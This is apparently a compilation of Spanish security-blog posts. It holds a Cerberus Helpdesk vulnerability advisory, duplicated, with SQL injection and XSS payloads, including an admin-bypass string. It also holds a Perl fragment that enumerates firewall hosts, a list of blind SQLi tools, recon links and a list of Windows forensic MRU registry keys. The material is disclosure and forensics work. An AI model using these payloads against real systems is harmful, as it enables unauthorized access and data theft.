Proto => 'tcp') or die "ERROR! $!\n";
print $sock "\x31\x00\x00\x00";
print $sock "\x00\x00\x00\x0C\x00\x00\x00\x04\xD4\xA3\x9F\x02";
while(<$sock>) { $bytes .= unpack("H*",$_); }
print "fw1 string: $bytes\n";
print substr ($bytes, 16)."\n";
my $i = 0;
foreach ((substr $bytes, 16) =~/(.{8})/g) {
$host = ();
foreach my $ip (/(.{2})/g) {
$host .= hex($ip).".";
} $host =~ s/\.$//;
last if $host =~ /0\.0\.0/; push(@hosts, $host);
}
foreach (@hosts) { $i++; print "ipaddr[$i]: $_\n"; }

download pl

Title: Cerberus Helpdesk multiple vulnerabilities.
Severity: Medium
Affected: cerberus-gui (2.649), support-center (2.649<->3.2.0pr2)
Problem type: remote

Description:
-------------------------------------------------------------------------------

Cerberus Helpdesk is a WebGroup Media helpdesk suite based in php enviroment.
Official webpage: http://www.cerberusweb.com/

Details:
-------------------------------------------------------------------------------

support-center:
*******************************

SQL injection in attachment_send.php (line 112):
You can download files from other users or use blind sql injection attacks:
Example url:
.../support-center/cerberus-support-center/attachment_send.php?file_id=N [SQL] &thread_id=1
CODE:
$sql = "SELECT part_content FROM thread_attachments_parts WHERE file_id = $file_id";

XSS:
http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

cerberus-gui (parser-related):
*******************************

There are few sql injections if XML is malicious generated:

SQL injections in email_parser.php:

Function: "is_queue_address" (line: 1397) doesn.t check properly the "$addy" value.
CODE:
$sql = sprintf("SELECT q.queue_name, q.queue_mode, q.queue_email_display_name, ".
"qa.queue_addresses_id, qa.queue_id, qa.queue_address, ".
"qa.queue_domain, q.queue_prefix, q.queue_response_open, ".
"q.queue_send_open, q.queue_response_gated ".
"FROM queue_addresses qa ".
"LEFT JOIN queue q USING (queue_id) ".
"WHERE LOWER(qa.queue_address) = '%s' ".
"AND LOWER(qa.queue_domain) = '%s'",
strtolower($mailbox),
strtolower($domain)

Function: "is_banned_address" (line: 752) doesn.t check "$address" properly.
CODE:
SELECT a.address_banned FROM address a WHERE a.address_address = '".$address."'";

Function: "is_admin_address" (line 1532) you can bypass this function using, as an email address, the following query: "'OR'u.user_superuser'='1'--".
Example of result of this query:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '' OR u.user_superuser = '1'
CODE:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '$address'";

SQL injection in structs.php:
Function: "cer_email_address_struct" (line: 167) doesn.t check the following query.
CODE:
$sql = "SELECT a.address_id,a.address_banned FROM address a WHERE a.address_address = '" . $a_address . "'";

cerberus-gui:
*******************************

SQL injection in cer_KnowledgebaseHandler.class.php:
Function: "_load_article_details" (line 270), you can fetch "superuser" md5 password with blind sql injection.
Example URL:
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL]
CODE:
$sql = "SELECT k.kb_id, k.kb_entry_date, k.kb_public, k.kb_category_id, k.kb_keywords, kp.kb_problem_summary, kp.kb_problem_text, kp.kb_problem_text_is_html, " .
" ks.kb_solution_text, ks.kb_solution_text_is_html, kc.kb_category_name, u.user_login As entry_user, k.kb_avg_rating, k.kb_rating_votes " .
" FROM knowledgebase k LEFT JOIN knowledgebase_problem kp ON (kp.kb_id=k.kb_id) LEFT JOIN knowledgebase_solution ks on (ks.kb_id=k.kb_id) ".
" LEFT JOIN knowledgebase_categories kc ON (kc.kb_category_id=k.kb_category_id) LEFT JOIN user u ON (k.kb_entry_user=u.user_id) " .
" WHERE k.kb_id = " . $kbid;


SQL injection in "addresses_export.php":
Example URL:
POST: /cerberus-gui/addresses_export.php
sid=c61ce82aa50569705dd774c33644446c&queues%5B%5D=[SQL]&delimiter=comma&file_type=screen&form_submit=x
CODE:
$sql = "SELECT DISTINCT a.address_address FROM ticket t LEFT JOIN thread th ON (t.min_thread_id=th.thread_id)
LEFT JOIN address a ON (th.thread_address_id=a.address_id) WHERE t.ticket_queue_id IN ($queues) ORDER BY a.address_address ASC;";

SQL injection in "display.php". "$thread" is not checked
CODE:
$sql = "SELECT th.thread_address_id, a.address_address FROM thread th LEFT JOIN address a ON (th.thread_address_id = a.address_id) ".
"WHERE th.thread_id = " . $thread;

SQL injection in "display_ticket_thread.php" (line 52).
Example URL:
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]
CODE:
$sql = "SELECT t.ticket_id, t.ticket_subject, t.ticket_status, t.ticket_date, t.ticket_assigned_to_id, t.ticket_queue_id, t.ticket_priority, th.thread_address_id, ad.address_address, t.queue_addresses_id, q.queue_name " .
"FROM ticket t, thread th, address ad, queue q " .
"WHERE t.ticket_queue_id IN ($u_qids) AND th.ticket_id = t.ticket_id AND t.ticket_queue_id = q.queue_id AND th.thread_address_id = ad.address_id AND t.ticket_id = " . $ticket . " GROUP BY th.thread_id LIMIT 0,1";

Solution:
-------------------------------------------------------------------------------
Not available, maybe changing every "$cerberus_db->query($sql)" to "$cerberus_db->escape($sql)".

History:
-------------------------------------------------------------------------------
15-20/Nov/2005 --- Bugs discovered
11/Dec/2005 --- The Author has been notified .
19/Dec/2005 --- Full disclosure

He desarrollado un script basandome en el codigo de ilo- (www.reversing.org),
que realiza brute force en webs que tengan algun fallo de inyección de SQL ciega

Tambien he publicado unos fallos con los que he probado la herramienta, asi como
un video donde se ve como funciona...

Además hacktimes va a publicar un articulo sobre blind sql injection con
más información.

bsqlbf.pl: script
bsqlbf.avi: video

Title: Cerberus Helpdesk multiple vulnerabilities.
Severity: Medium
Affected: cerberus-gui (2.649), support-center (2.649<->3.2.0pr2)
Problem type: remote

Description:
-------------------------------------------------------------------------------

Cerberus Helpdesk is a WebGroup Media helpdesk suite based in php enviroment.
Official webpage: http://www.cerberusweb.com/

Details:
-------------------------------------------------------------------------------

support-center:
*******************************

SQL injection in attachment_send.php (line 112):
You can download files from other users or use blind sql injection attacks:
Example url:
.../support-center/cerberus-support-center/attachment_send.php?file_id=N [SQL] &thread_id=1
CODE:
$sql = "SELECT part_content FROM thread_attachments_parts WHERE file_id = $file_id";

XSS:
http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

cerberus-gui (parser-related):
*******************************

There are few sql injections if XML is malicious generated:

SQL injections in email_parser.php:

Function: "is_queue_address" (line: 1397) doesn.t check properly the "$addy" value.
CODE:
$sql = sprintf("SELECT q.queue_name, q.queue_mode, q.queue_email_display_name, ".
"qa.queue_addresses_id, qa.queue_id, qa.queue_address, ".
"qa.queue_domain, q.queue_prefix, q.queue_response_open, ".
"q.queue_send_open, q.queue_response_gated ".
"FROM queue_addresses qa ".
"LEFT JOIN queue q USING (queue_id) ".
"WHERE LOWER(qa.queue_address) = '%s' ".
"AND LOWER(qa.queue_domain) = '%s'",
strtolower($mailbox),
strtolower($domain)

Function: "is_banned_address" (line: 752) doesn.t check "$address" properly.
CODE:
SELECT a.address_banned FROM address a WHERE a.address_address = '".$address."'";

Function: "is_admin_address" (line 1532) you can bypass this function using, as an email address, the following query: "'OR'u.user_superuser'='
1'--".
Example of result of this query:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '' OR u.user_superuser = '1'
CODE:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '$address'";

SQL injection in structs.php:
Function: "cer_email_address_struct" (line: 167) doesn.t check the following query.
CODE:
$sql = "SELECT a.address_id,a.address_banned FROM address a WHERE a.address_address = '" . $a_address . "'";

cerberus-gui:
*******************************

SQL injection in cer_KnowledgebaseHandler.class.php:
Function: "_load_article_details" (line 270), you can fetch "superuser" md5 password with blind sql injection.
Example URL:
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL]
CODE:
$sql = "SELECT k.kb_id, k.kb_entry_date, k.kb_public, k.kb_category_id, k.kb_keywords, kp.kb_problem_summary, kp.kb_problem_text, kp.kb_p
roblem_text_is_html, " .
" ks.kb_solution_text, ks.kb_solution_text_is_html, kc.kb_category_name, u.user_login As entry_user, k.kb_avg_rating, k.kb_rating_votes "
.
" FROM knowledgebase k LEFT JOIN knowledgebase_problem kp ON (kp.kb_id=k.kb_id) LEFT JOIN knowledgebase_solution ks on (ks.kb_id=k.kb_id)
".
" LEFT JOIN knowledgebase_categories kc ON (kc.kb_category_id=k.kb_category_id) LEFT JOIN user u ON (k.kb_entry_user=u.user_id) " .
" WHERE k.kb_id = " . $kbid;

SQL injection in "addresses_export.php":
Example URL:
POST: /cerberus-gui/addresses_export.php
sid=c61ce82aa50569705dd774c33644446c&queues%5B%5D=[SQL]&delimiter=comma&file_type=screen&form_submit=x
CODE:
$sql = "SELECT DISTINCT a.address_address FROM ticket t LEFT JOIN thread th ON (t.min_thread_id=th.thread_id)
LEFT JOIN address a ON (th.thread_address_id=a.address_id) WHERE t.ticket_queue_id IN ($queues) ORDER BY a.address_address ASC;";

SQL injection in "display.php". "$thread" is not checked
CODE:
$sql = "SELECT th.thread_address_id, a.address_address FROM thread th LEFT JOIN address a ON (th.thread_address_id = a.address_id) ".
"WHERE th.thread_id = " . $thread;

SQL injection in "display_ticket_thread.php" (line 52).
Example URL:
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]
CODE:
$sql = "SELECT t.ticket_id, t.ticket_subject, t.ticket_status, t.ticket_date, t.ticket_assigned_to_id, t.ticket_queue_id, t.ticket_priori
ty, th.thread_address_id, ad.address_address, t.queue_addresses_id, q.queue_name " .
"FROM ticket t, thread th, address ad, queue q " .
"WHERE t.ticket_queue_id IN ($u_qids) AND th.ticket_id = t.ticket_id AND t.ticket_queue_id = q.queue_id AND th.thread_address_id = ad.add
ress_id AND t.ticket_id = " . $ticket . " GROUP BY th.thread_id LIMIT 0,1";

Solution:
-------------------------------------------------------------------------------
Not available, maybe changing every "$cerberus_db->query($sql)" to "$cerberus_db->escape($sql)".

History:
-------------------------------------------------------------------------------
15-20/Nov/2005 --- Bugs discovered
11/Dec/2005 --- The Author has been notified .
19/Dec/2005 --- Full disclosure

Leido en pen-test:

http://tripp.dynalias.org/


http://www.imperva.com/application_defense_center/tools.asp


http://www.int0x21.com/


http://jacquelin.potier.free.fr/networkstuff/

Nota mental: no olvidar estos links

http://www.netcraft.com
http://webhosting.info
http://www.domainsdb.net/
http://www.searchmee.com/web-info/ip-hunt.php
http://www.domaintools.com/reverse-ip/
http://www.archive.org
http://search.msn.com <-- Buscar por IP:x.x.x.x

Actualizado: Sun Oct 15 23:59:01 CEST 2006
http://www.seologs.com/ip-domains.html (thx aklis)
Actualizado: Sun Thu Mar 15 12:03:33 CET 2007
http://www.tomdns.net/index.php

Nota mental 2: usar algun dia la feature de bookmarks del browser

MiTeC, para estudiar el prefetch, thumbnails, lnks, el registro, información de la papelera de reciclaje.... etc etc http://www.mitec.cz/
Parece que el WRA ya no esta disponible en la web oficial, un día subo un backup.
Actualizado: Mon Oct 16 00:04:20 CEST 2006


WRA.zip (danke DS)

No he encontrado mucha información ni ningún listado de claves del registro de windows donde encontrar los MRU más importantes y que se deberian de consultar en todo forense que se precie.

Haciendo un poco de reversing sobre MRU-Blaster y mirando en varios registros, he podido obtener un listado medianamente aceptable.

Trataré de gestionar esta información en un excel que dejaremos colgado en la web de 514.es.

Esta información se puede consultar mediante perl sobre un archivo .reg (exportable facilmente desde el propio regedit, o herramientas como WRR de mitec) o mediante comandos de sistema si el equipo esta encendido:

C:\> reg query "HKCU\Software\Microsoft\Office\11.0\Excel\Resiliency\DocumentRecovery" /s

O hacer un script para que recorrar un archivo y pruebe todas las posibles opciones:
C:\> for /F %i in (forensic_mru.txt) do reg query "%i" /s

Una forma de buscar estas claves de forma rápida y ampliar la lista, podría ser:

C:\>reg query HKCU\ /s | find "Opened" | find "HKEY"
C:\>reg query HKCU\ /s | find "MRU" | find "HKEY"
C:\>reg query HKCU\ /s | find "Recent File List" | find "HKEY"

Y esta es la lista....

HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft Word\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft Word\Settings\Open\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft Word\Settings\Create custom dictionary\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft Word\Settings\Add Custom Dictionary\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft PowerPoint\Settings\Insert Picture\File Name MRU
HKCU\Software\Microsoft\Office\9.0\Common\Open Find\Microsoft PowerPoint\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Open\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Create custom dictionary\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Add Custom Dictionary\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\Insert Picture\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Word\Settings\New from Existing Document\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft PowerPoint\Settings\Insert Picture\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft PowerPoint\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Document Imaging\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\10.0\Common\Open Find\Microsoft Document Imaging\Settings\Open\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Microsoft Word\Settings\Save As\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Microsoft Word\Settings\Open\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Microsoft Word\Settings\Select File to Merge Into Current Document\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Office\Settings\Open Office Document\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Office\Settings\Open Office Document\Any Text MRU
HKCU\Software\Microsoft\Office\8.0\Common\Open Find\Microsoft PowerPoint\Settings\Save\File Name MRU
HKCU\Software\Microsoft\Office\8.0\Excel\Recent File List
HKCU\Software\Microsoft\Office\9.0\Excel\Recent Files
HKCU\Software\Microsoft\Office\10.0\PowerPoint\Recent File List
HKU\.DEFAULT\Software\Microsoft\Office\10.0\Excel\Recent Files
HKCU\Software\Microsoft\Office\10.0\Excel\Recent Files
HKCU\Software\Microsoft\Office\11.0\Excel\Resiliency\DocumentRecovery
HKCU\Software\Microsoft\Office\10.0\Excel\Recent Templates
HKCU\Software\Microsoft\Office\10.0\PowerPoint\Recent Templates
HKCU\Software\Microsoft\Office\10.0\Word\Recent Templates
HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent File List
HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List
HKCU\Software\Gabest\Media Player Classic\Recent Dub List
HKU\.DEFAULT\Software\Microsoft\MSPaper\Persist File Name
HKCU\Software\Microsoft\MSPaper\Persist File Name
HKCU\Software\Microsoft\MSPaper\Recent File List
HKCU\Software\Foxit Software\Foxit Reader\Recent File List
HKU\.DEFAULT\Software\Microsoft\MSE\10.0\FileMRUList
HKU\.DEFAULT\Software\Microsoft\MSE\10.0\ProjectMRUList
HKU\.DEFAULT\Software\Microsoft\MSE\10.0\SolutionMRUList
HKCU\Software\Microsoft\MSE\10.0\FileMRUList
HKCU\Software\Microsoft\MSE\10.0\ProjectMRUList
HKCU\Software\Microsoft\MSE\10.0\SolutionMRUList
HKCU\Software\Corel\User Assistant\9\Recent Work\WordPerfect\Last Opened
HKCU\Software\Corel\User Assistant\10\Recent Work\WordPerfect\Last Opened
HKCU\Software\Corel\User Assistant\9\Recent Work\QuattroPro\Last Opened
HKCU\Software\Corel\User Assistant\10\Recent Work\QuattroPro\Last Opened
HKCU\Software\Corel\User Assistant\9\Recent Work\Corel Presentations\Last Opened
HKCU\Software\Corel\User Assistant\10\Recent Work\Corel Presentations\Last Opened
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKCU\Software\Microsoft\Internet Explorer\TypedURLs
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\TypedURLs
HKCU\Software\Microsoft\MediaPlayer\Player\RecentFileList
HKCU\Software\Microsoft\MediaPlayer\Player\Settings\OpenDir
HKU\.DEFAULT\Software\Microsoft\MediaPlayer\Player\RecentFileList
HKCU\Software\Microsoft\MediaPlayer\Player\Settings\SaveAsDir
HKCU\Software\Microsoft\MediaPlayer\Preferences\CDRecordPath
HKCU\Software\Microsoft\MediaPlayer\Preferences\LastPlaylist
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List
HKCU\Software\Google\NavClient\1.1\History
HKU\.DEFAULT\Software\7-ZIP\FM
HKCU\Software\7-ZIP\FM
HKCU\Software\ahead\Nero - Burning Rom\Settings\BrowserDir
HKCU\Software\ahead\Nero - Burning Rom\Settings\ImageDir
HKCU\Software\ahead\Nero - Burning Rom\Settings\NeroCompilation
HKCU\Software\ahead\Nero - Burning Rom\Settings\WorkingDir
HKU\.DEFAULT\Software\Macromedia\Flash 6\Open Document
HKCU\Software\Macromedia\Flash 6\Open Document
HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\LastLoginTime
HKCU\Software\RealNetworks\RealPlayer\6.0\Preferences\LastOpenFileDir
HKCU\Software\SmartFTP\Queue
HKCU\Software\SmartFTP\LocalView
HKCU\Software\WinRAR\General\LastFolder
HKCU\Software\Nico Mak Computing\WinZip\directories
HKCU\Software\Adobe\Acrobat Reader\5.0\AVGeneral\cRecentFiles
HKU\.DEFAULT\Software\Adobe\Acrobat Reader\5.0\AVGeneral\cRecentFiles
HKU\.DEFAULT\Software\Adobe\Acrobat Reader\6.0\AVGeneral\cRecentFiles
HKCU\Software\Adobe\Acrobat Reader\6.0\AVGeneral\cRecentFiles
HKU\.DEFAULT\Software\Adobe\Adobe Acrobat\6.0\AVGeneral\cRecentFiles
HKCU\Software\Adobe\Adobe Acrobat\6.0\AVGeneral\cRecentFiles\c1
HKCU\Software\MGI\VideoWave\Recent File List
HKCU\Software\Sierra Imaging\Image Expert 2000\Recent Album List
HKCU\Software\ahead\Nero - Burning Rom\Recent File List
HKU\.Default\Software\ahead\Nero - Burning Rom\Recent File List
HKCU\Software\ahead\nero wave editor\Recent File List
HKU\.Default\Software\ahead\nero wave editor\Recent File List
HKCU\Software\ahead\Cover Designer\Recent File List
HKU\.Default\Software\ahead\Cover Designer\Recent File List
HKCU\Software\BVRP Software\Annuaire\Recent File List
HKCU\Software\Microsoft\HTML Help Workshop\Recent File List
HKCU\Software\Microsoft\HTML Help Workshop\Project Files
HKCU\Software\Microsoft\HTML Help Workshop\Html Titles
HKCU\Software\Microsoft\HTML Help Workshop\Compressed HTML
HKCU\Software\Microsoft\Picture It! Publishing\5.0\Recent File List
HKCU\Software\Software602\602Tab\Recent File List
HKCU\Software\Software602\WinMgr\1.0\602Tab\Recent Files
HKCU\Software\Software602\602Text\2000\Settings
HKCU\Software\TMT Development\TMT Pascal Lite 3
HKCU\Software\HeadLight\GetRight\TypedURLs
HKU\.Default\Software\HeadLight\GetRight\TypedURLs
HKCU\Software\Jasc\Paint Shop Pro 6\Recent File List
HKCU\Software\Jasc\Paint Shop Pro 7\Recent File List
HKCU\Software\Jasc\Paint Shop Pro 8\Recent File List
HKCU\Software\Greatis\Regrun2\RegAdviser\LocateHistory
HKCU\Software\Ontrack\PowerDesk\CurrentVersion\PDFind\FileNames
HKCU\Software\SpeedBit\Download Accelerator\HistoryCombo
HKCU\Software\Microsoft\Office\10.0\Clip Organizer\Search\Last Query
HKU\.Default\Software\Microsoft\Office\10.0\Clip Organizer\Search\Last Query
HKCU\Software\Microsoft\ClipArt Gallery\2.0\MRUDescription
HKU\.DEFAULT\Software\JetCar\JetCar\Recent File List
HKU\.DEFAULT\Software\JetCar\JetCar\DownDir
HKCU\Software\JetCar\JetCar\Recent File List
HKCU\Software\JetCar\JetCar\DownDir
HKU\.DEFAULT\Software\VB and VBA Program Settings\Microsoft Visual Basic AddIns\VisData6
HKCU\Software\VB and VBA Program Settings\Microsoft Visual Basic AddIns\VisData6
HKU\.DEFAULT\Software\CursorArts\MRU Items
HKCU\Software\CursorArts\MRU Items
HKU\.DEFAULT\Software\Spidersoft\WebZIP\Settings
HKCU\Software\Spidersoft\WebZIP\Settings
HKU\.DEFAULT\Software\Advanced Grapher\RecentFiles
HKCU\Software\Advanced Grapher\RecentFiles
HKU\.DEFAULT\Software\MeeSoft\ImageAnalyzer
HKCU\Software\MeeSoft\ImageAnalyzer
HKU\.DEFAULT\Software\InstallShield\Express\4.0\Recent File List
HKCU\Software\InstallShield\Express\4.0\Recent File List
HKU\.DEFAULT\Software\Impact\Microangelo\Animator\MRU List
HKU\.DEFAULT\Software\Impact\Microangelo\Librarian\MRU List
HKU\.DEFAULT\Software\Impact\Microangelo\Studio\MRU List
HKCU\Software\Impact\Microangelo\Animator\MRU List
HKCU\Software\Impact\Microangelo\Librarian\MRU List
HKCU\Software\Impact\Microangelo\Studio\MRU List
HKCU\Software\Impact\Microangelo\Animator\MRU List
HKU\.DEFAULT\Software\FerretSoft\NetFerret\CurrentVersion\Web
HKCU\Software\FerretSoft\NetFerret\CurrentVersion\Web
HKU\.DEFAULT\Software\ORL\VNCviewer\MRU
HKCU\Software\ORL\VNCviewer\MRU
HKU\.DEFAULT\Software\PowerArchiver\Files
HKCU\Software\PowerArchiver\Files
HKU\.DEFAULT\Software\Microsoft\DevStudio\6.0\Recent File List
HKCU\Software\Microsoft\DevStudio\6.0\Recent File List
HKU\.DEFAULT\Software\e-merge\WinAce\2.0\MRU Items
HKCU\Software\e-merge\WinAce\2.0\MRU Items
HKU\.DEFAULT\Software\JGsoft\EditPadLite\Search
HKCU\Software\JGsoft\EditPadLite\Reopen
HKU\.DEFAULT\Software\VB and VBA Program Settings\3D Canvas\Application
HKCU\Software\VB and VBA Program Settings\3D Canvas\Application
HKCU\Software\7-ZIP\FM
HKU\.DEFAULT\Software\Vallen-Systeme GmbH\Vallen JPegger\MRU-Files-BMP&PCX
HKU\.DEFAULT\Software\Vallen-Systeme GmbH\Vallen JPegger\MRU-Folders-IMG
HKU\.DEFAULT\Software\Vallen-Systeme GmbH\Vallen JPegger\MRU-Folders-MP3
HKCU\Software\Vallen-Systeme GmbH\Vallen Zipper\MRU-Files-ZIP
HKU\.DEFAULT\Software\M.Dev Software\ZG5\MRU Items
HKCU\Software\M.Dev Software\ZG5\MRU Items
HKCU\Software\WinRAR\ArcHistory
HKCU\Software\Trident Software\PowerZip\Recent File List
HKCU\Software\Trident Software\PowerZip\Doc
HKCU\Software\WinRAR\DialogEditHistory\ExtrPath
HKCU\Software\Nico Mak Computing\WinZip\extract
HKCU\Software\Gnucleus\Searches
HKCU\Software\Kazaa\Search
HKU\.Default\Software\Kazaa\Search
HKCU\Software\Jasc\Animation Shop 2\Recent File List
HKCU\Software\Jasc\Animation Shop 3\Recent File List
HKCU\Software\Jasc\Jasc Media Center Plus\Recent File List
HKCU\Software\Jasc\Jasc WebDraw 1\Recent File List
HKCU\Software\Macromedia\Flash 5\Recent File List
HKCU\Software\Macromedia\Flash 6\Recent File List
HKCU\Software\Macromedia\Firework 6\Recent File List
HKCU\Software\Macromedia\Dreamweaver 4\Recent File List
HKCU\Software\Macromedia\Dreamweaver 6\Recent File List
HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication
HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication
HKCU\SOFTWARE\Microsoft\DirectInput\MostRecentApplication
HKCU\Software\Ulead Systems\Ulead PhotoImpact\7.0\Recent File List
HKCU\Software\SpeedBit\Download Accelerator\HistoryCombo
HKCU\Software\Microsoft\Office\10.0\Clip Organizer\Search\Last Query
HKU\.Default\Software\Microsoft\Office\10.0\Clip Organizer\Search\Last Query
HKCU\Software\Microsoft\ClipArt Gallery\2.0\MRUDescription
HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor
HKU\.DEFAULT\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor
HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor
HKCU\Software\Creative Tecg\Creative Wavestudio\Settings
HKCU\Software\Freeware\VirtualDub\MRU List
HKCU\Software\Microsoft\Journal Viewer\MRU
HKCU\Software\Ying3\DLExpert\MAIN
HKCU\Software\Microsoft\Search Assistant\ACMru\5001
HKCU\InstallLocationsMRU
HKU\.Default\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU
HKU\.Default\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU
HCKU\Software\ORL\VNCviewer\MRU
HCKU\Software\RealVNC\VNCViewer4\MRU
HCKU\Software\Ahead\Cover Designer\Recent File List
HCKU\Software\Ahead\Nero - Burning Rom\Recent File List
HCKU\Software\Ahead\Nero WaveEditor\Recent File List
HCKU\Software\DVD Shrink\DVD Shrink 3.2\Recent File List
HCKU\Software\DVDAuthor2\DVD-lab\Recent File List
HCKU\Software\JetCar\JetCar\Recent File List
HCKU\Software\Macromedia\Dreamweaver 8\Recent File List
HCKU\Software\Macromedia\Fireworks\8\ini\Recent File List
HCKU\Software\Macromedia\Flash 8\Recent File List
HCKU\Software\Microsoft\Consola de administración de Microsoft\Recent File List
HCKU\Software\SoulSeek\SoulSeek\Recent File List
HCKU\Software\WinHTTrack Website Copier\WinHTTrack Website Copier\Recent File List

Básicamente:

aramosf~$ echo -e "GET / HTTP/1.0\nHost:www.gmail.com\n\n" | openssl s_client -quiet -connect www.gmail.com:443 2>/dev/null|awk -F: '/^Server:/ { print $2 }'

Listado al canto:

sqlbf: sin duda alguna, la primera, la mejor. Los genios hacen genialidades.
sqlinjector: de NGSSoftware, a dia de hoy, un poco desfasada.
bfsql blind sql injection para mysql (la mia, vamos). un TODO infinito. y un BUGS infinito++
sqlpowerinjector: mysql, oracle, sql-server, postgresql, ¿sybase?.. sql injection normal y blind. Jamas la he conseguido hacer funcionar.
sqlmap: blind para mysql y postgresql
sqlninja: injection para sql-server.
bobcat: para sql-server. no está mal, pero hay que montar un MSDE para hacerla rular... y le cuesta!
absinthe: : postgresql, oracle, sql-server, ¿sybase?... bastante maja, aunque tiene un par de fallos que podrian mejorarse...
sqlbrute: sql-server y oracle. blind sql injection para dumpear tablas. no va todo lo fina que deberia.
automagic: automatización para explotar sql-server.
webinspect - sql injector: Comercial, solo disponible en el paquete de webinspect, oracle, sql server, sybase... realmente buena.
SQLIBF: realmente buena, muy potente. nice work!
Priamos SQLdump de sql-server. Muy sencillo/eficaz en mi experiencia.
FG-Injector: un poco liosa en su uso, pero eficiente.
SQLDumper:No la he testado aún.
SQL Injection Tool: Sin probar.
ISR-sqlget. Sin probar
SQLix De OWASP, bastante simple.
SQLID En ruby, no me convence
SQLier script en bash... ehm..
Pangolin En los 3 SQL que he probado, no ha funcionando en ninguno, eso si, tiene buena pinta.
Squeeza Para MSSQL, liberado en bh2007, ataque basado en tiempo.
BSQLHacker Funciona bajo windows, para MSSQL, Oracle y en beta MySQL, basado en tiempos.